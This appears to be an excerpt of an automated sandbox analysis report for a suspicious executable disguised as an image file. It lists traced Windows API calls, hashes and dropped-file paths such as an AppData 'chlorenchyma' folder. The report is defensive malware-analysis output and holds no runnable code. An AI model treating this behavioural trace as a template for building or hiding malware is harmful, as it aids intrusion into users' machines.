                                        • Instruction ID: 0d77a24040528495e1d5683a333844bda4a24a81b27895c3293bddb668a77566
                                        • Opcode Fuzzy Hash: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                        • Instruction Fuzzy Hash: 20E0EC3221065EABDF509F55DC00EEB7B6CEB05360F004837F965E2150D631EA219BE9
                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040338D,00000000,00000000,004031B7,000000FF,00000004,00000000,00000000,00000000), ref: 00405EAC
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                                        • Instruction ID: c4f2c5db2c8838af9825f3b875f3a0ad88d5b51994199861a780369f0be58439
                                        • Opcode Fuzzy Hash: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                                        • Instruction Fuzzy Hash: E4E04F32210619ABDF109F60DC04EAB3B6CEB00351F000432F954E2140D230E9118AE4
                                        APIs
                                        • VirtualProtect.KERNELBASE(6E33504C,00000004,00000040,6E33503C), ref: 6E3329CF
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e330000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 03985acc724b93e27526cd515bcfc72a6696ce7190b12ed8e89bf22c77568e79
                                        • Instruction ID: 18e734b0aa2cc48c338ef6943dcd83713d8b582fdb59bcd80c540cece29c91a3
                                        • Opcode Fuzzy Hash: 03985acc724b93e27526cd515bcfc72a6696ce7190b12ed8e89bf22c77568e79
                                        • Instruction Fuzzy Hash: 40F0A5F0614AC0FECB70CF688584F093BE8BB1A356F3049EAE148DA241E3364084CF91
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,0042DFC0,?,?,?,004061A1,?,?,?,?,00000000,?), ref: 00406137
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                        • Instruction ID: 4278cf0171cf0b678593f71500b3925c4415a8e9ce87015ff7d519d2eb21bae6
                                        • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                        • Instruction Fuzzy Hash: BCD0123204020DBBDF119E90AD01FAB3B1DEB48350F014826FE07A8091D775D570A724
                                        APIs
                                        • SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040438B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
                                        • Instruction ID: f513ac05e70e3adf76b651c0ca8ec4e95b66ff2fdc1b64d79a05bcbbe3c40a95
                                        • Opcode Fuzzy Hash: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
                                        • Instruction Fuzzy Hash: 4DC09BB17403027BFE209B529E45F077798D790700F1554397754F54D0C774D410D62C
                                        APIs
                                        • SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: f6c8117e81de0903b802e48e7999fd2a70a6c35278de0d39013be8dd7138c214
                                        • Instruction ID: 50a7fc5ec129452a525cde7c4fd9a9aa290cced010421ab9f43a5acdc6dad314
                                        • Opcode Fuzzy Hash: f6c8117e81de0903b802e48e7999fd2a70a6c35278de0d39013be8dd7138c214
                                        • Instruction Fuzzy Hash: 33B0127A781601BBDE615B40DF09F457EB2E768701F408039B348240F0CEB200A9DB2C
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030F6,?,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 0040339E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                        • Instruction ID: 699dda5fb03a211c19396a68767747e6c986426da1756d7c47186a7ffa8d2f84
                                        • Opcode Fuzzy Hash: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                        • Instruction Fuzzy Hash: EBB01231140300BFDA214F00DF09F057B21AB94710F10C034B384780F086711075EB0E
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,0040412B), ref: 00404359
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: b7efc8905e9f2a5b3d5d2c2477723ee0501502072c4fff85560e1a7fdf79de64
                                        • Instruction ID: b84ed7fd3cc5f3c3e9fcd53eb4babc11f88d3e7fa425116ebe2a9639eb74f9e6
                                        • Opcode Fuzzy Hash: b7efc8905e9f2a5b3d5d2c2477723ee0501502072c4fff85560e1a7fdf79de64
                                        • Instruction Fuzzy Hash: 28A00176505500AFCA12AB50EF1980ABB66ABA4741B818479A685601358B768831EB1B
                                        APIs
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                          • Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0), ref: 0040542D
                                          • Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll), ref: 0040543F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                          • Part of subcall function 00405926: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042BC90,00431800,00431800,00431800,?,888,00000000), ref: 0040594F
                                          • Part of subcall function 00405926: CloseHandle.KERNEL32(?), ref: 0040595C
                                        • CloseHandle.KERNELBASE(?,?,?,?,?,?), ref: 00401FE5
                                          • Part of subcall function 0040672A: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040673B
                                          • Part of subcall function 0040672A: GetExitCodeProcess.KERNEL32(?,?), ref: 0040675D
                                          • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                        • String ID:
                                        • API String ID: 2972824698-0
                                        • Opcode ID: 454ea4004c7b636409d34e166e2968104a6dcee143e6bdf8ca8e7598c6747e23
                                        • Instruction ID: 2907458289dc89520fdc1db2e5a40f60bb15031deda838765eaf0f6b46983df9
                                        • Opcode Fuzzy Hash: 454ea4004c7b636409d34e166e2968104a6dcee143e6bdf8ca8e7598c6747e23
                                        • Instruction Fuzzy Hash: 0EF05B31905112DBCF20ABA55D849EF71E4DB0135CB11413FF501F21D2D7BC4A46DAAE
                                        APIs
                                        • Sleep.KERNELBASE(00000000), ref: 004014E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 1086b86eff6ccb0646e334d3d3a43b9eec11b9d4dc04b4a1abbda41f1d779818
                                        • Instruction ID: 2b610f9d6ca2559d84a6cccd890523da06de060bf9d54f72eb9b50da0c514afd
                                        • Opcode Fuzzy Hash: 1086b86eff6ccb0646e334d3d3a43b9eec11b9d4dc04b4a1abbda41f1d779818
                                        • Instruction Fuzzy Hash: 1CD05E73B142009BDB60DBB8BEC445F73E4E7403257304837E502E2092E5788946861C
                                        APIs
                                        • GetDlgItem.USER32(?,000003FB), ref: 0040480E
                                        • SetWindowTextA.USER32(00000000,?), ref: 00404838
                                        • SHBrowseForFolderA.SHELL32(?,00429860,?), ref: 004048E9
                                        • CoTaskMemFree.OLE32(00000000), ref: 004048F4
                                        • lstrcmpiA.KERNEL32(0042DFC0,0042A488), ref: 00404926
                                        • lstrcatA.KERNEL32(?,0042DFC0), ref: 00404932
                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404944
                                          • Part of subcall function 00405987: GetDlgItemTextA.USER32(?,?,00000400,0040497B), ref: 0040599A
                                          • Part of subcall function 00406587: CharNextA.USER32(0000000C,*?|<>/":,00000000,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                          • Part of subcall function 00406587: CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                          • Part of subcall function 00406587: CharNextA.USER32(0000000C,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                          • Part of subcall function 00406587: CharPrevA.USER32(0000000C,0000000C,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                        • GetDiskFreeSpaceA.KERNEL32(00429458,?,?,0000040F,?,00429458,00429458,?,00000001,00429458,?,?,000003FB,?), ref: 00404A02
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A1D
                                          • Part of subcall function 00404B76: lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                          • Part of subcall function 00404B76: wsprintfA.USER32 ref: 00404C1C
                                          • Part of subcall function 00404B76: SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                        Strings
                                        • A, xrefs: 004048E2
                                        • C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate, xrefs: 0040490F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: A$C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate
                                        • API String ID: 2624150263-2737355476
                                        • Opcode ID: 0a9a22de57e54a42c41f7f9c473854a5632b4b75f318642da20d5b1a73d2513c
                                        • Instruction ID: f53f9ae5ebeaccab956e1b2ad526c51027fc30446c854342799b5ba7b8d0bc76
                                        • Opcode Fuzzy Hash: 0a9a22de57e54a42c41f7f9c473854a5632b4b75f318642da20d5b1a73d2513c
                                        • Instruction Fuzzy Hash: BAA172F1A00209ABDB11AFA5CD45AAF76B8EF84314F14807BF611B62D1D77C89418F6D
                                        APIs
                                          • Part of subcall function 6E3312A5: GlobalAlloc.KERNEL32(00000040,6E3312C3,?,6E33135F,-6E33504B,6E3311C0,-000000A0), ref: 6E3312AD
                                        • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 6E331C54
                                        • lstrcpyA.KERNEL32(00000008,?), ref: 6E331C9C
                                        • lstrcpyA.KERNEL32(00000408,?), ref: 6E331CA6
                                        • GlobalFree.KERNEL32(00000000), ref: 6E331CB9
                                        • GlobalFree.KERNEL32(?), ref: 6E331D99
                                        • GlobalFree.KERNEL32(?), ref: 6E331D9E
                                        • GlobalFree.KERNEL32(?), ref: 6E331DA3
                                        • GlobalFree.KERNEL32(00000000), ref: 6E331F8A
                                        • lstrcpyA.KERNEL32(?,?), ref: 6E332128
                                        • GetModuleHandleA.KERNEL32(00000008), ref: 6E3321A4
                                        • LoadLibraryA.KERNEL32(00000008), ref: 6E3321B5
                                        • GetProcAddress.KERNEL32(?,?), ref: 6E33220E
                                        • lstrlenA.KERNEL32(00000408), ref: 6E332228
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2088083079.000000006E331000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E330000, based on PE: true
                                        • Associated: 00000000.00000002.2088011783.000000006E330000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000000.00000002.2088098769.000000006E334000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000000.00000002.2088118015.000000006E336000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e330000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                        • String ID:
                                        • API String ID: 245916457-0
                                        • Opcode ID: 3fda07ff75f31c8923bed2b00ce74a214418530e2bd8fa761dac4d46121aa3d4
                                        • Instruction ID: 430543c75eff79c1c0d2a2541163112a8d78352068d7d8b859768e0a71191e7a
                                        • Opcode Fuzzy Hash: 3fda07ff75f31c8923bed2b00ce74a214418530e2bd8fa761dac4d46121aa3d4
                                        • Instruction Fuzzy Hash: E622C071D146AADEDB908FE8C990BEDBBF8BB06305F30856ED1A1E3180C7755549CB90
                                        APIs
                                        • CoCreateInstance.OLE32(0040851C,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040221D
                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022CF
                                        Strings
                                        • C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate, xrefs: 0040225D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID: C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate
                                        • API String ID: 123533781-1124611765
                                        • Opcode ID: 26e4af273d4ad834d7dd4ca4c27adc144b69110a5e0929a66cb48c7bfc0a4cbf
                                        • Instruction ID: 9693176738af107330769ac86e8646dde0b712c02a361864b0ed1875b7ced88a
                                        • Opcode Fuzzy Hash: 26e4af273d4ad834d7dd4ca4c27adc144b69110a5e0929a66cb48c7bfc0a4cbf
                                        • Instruction Fuzzy Hash: DB511971A00208AFDF00EFA4CA88A9D7BB5FF48314F2045BAF505FB2D1DA799981CB54
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027DE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        • Opcode ID: 930922f26d5cdd011eb09c6a8250f7f43846b17323c9774391e4e916de6dacb1
                                        • Instruction ID: 474e59c826447b87e47a37c01b73ad662870a85b7ff57bc711f4e8679485c19e
                                        • Opcode Fuzzy Hash: 930922f26d5cdd011eb09c6a8250f7f43846b17323c9774391e4e916de6dacb1
                                        • Instruction Fuzzy Hash: 9CF0A771605110DFDB51EBA49E49AEE77689F21314F6005BBE141F20C2C6B889469B2E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                                        • Instruction ID: 8768c5d39ca9d5d04b1d74764d0b3cf6a08d2071900a395e822ff8491b177041
                                        • Opcode Fuzzy Hash: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                                        • Instruction Fuzzy Hash: D0E18B7190470ACFDB24CF58C880BAAB7F1FB44305F15842EE497A72D1E738AA95CB14
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8d4d4038b428717fbb616dadee5392a57e0a8d9c6ebddc8936aa8167a04c56aa
                                        • Instruction ID: 112ec8b08e22b9c6c3aeb56eb94a2e19ac2cef272eed527e1014fed5102c6f46
                                        • Opcode Fuzzy Hash: 8d4d4038b428717fbb616dadee5392a57e0a8d9c6ebddc8936aa8167a04c56aa
                                        • Instruction Fuzzy Hash: 33C13631E04219DBCF18CF68D8905EEBBB2BF98314F25866AD85677380D734A942CF95
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 00404D49
                                        • GetDlgItem.USER32(?,00000408), ref: 00404D56
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DA5
                                        • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404DBC
